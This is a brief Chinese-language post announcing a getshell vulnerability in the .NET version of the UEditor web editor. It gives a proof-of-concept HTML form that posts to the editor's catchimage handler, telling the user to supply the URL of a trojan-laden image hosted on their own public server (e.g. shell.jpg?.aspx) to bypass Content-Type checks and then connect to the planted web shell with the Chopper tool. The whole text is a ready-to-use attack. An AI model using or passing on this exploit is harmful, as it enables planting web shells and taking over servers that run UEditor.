Ueditor编辑器出漏洞了,.NET版本可以直接getshell...
POC:
<form action="http://test.com/editor/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST">
<p>shell addr: <input type="text" name="source[]"/></p>
<input type="submit" value="Submit"/>
</form>
shell addr填写shell的地址,例如:http://myvps.com/shell.jpg?.aspx,使用包含木马的图片可以绕过Content-Type。注意shell文件需要放在公网ip上。
返回shell地址,使用菜刀连上。
网友评论